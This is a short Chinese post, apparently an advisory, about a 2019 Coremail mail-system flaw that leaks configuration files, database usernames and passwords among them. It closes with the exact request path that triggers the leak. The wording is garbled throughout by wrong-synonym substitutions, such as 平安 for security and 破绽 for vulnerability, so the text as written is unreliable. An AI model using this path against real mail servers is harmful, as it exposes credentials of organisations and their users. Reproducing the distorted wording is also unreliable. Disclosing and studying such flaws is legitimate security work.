概述

北京时间2019年6月14日。网络传播Coremail的配置信息泄露的poc,经过白帽汇平安研讨院确认破绽信息真实,影响局部版本。该破绽可形成coremail的配置文件信息泄露,其中包括数据库衔接的用户名密码等敏感信息。

Coremail产品降生于1999年,经过二十多年开展,往常从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。


截止2019年,Coremail邮件系统产品在国内已具有10亿终端用户 ,是目前国内具有邮箱运用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、挪动,联通等知名运营商提供电子邮件整体技术处理计划及企业邮局运营效劳,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反渣滓效劳。

旧版本经过测试,的确存在破绽

Coremail地址 + /mailsms/s?func=ADMIN:appState&dumpConfig=/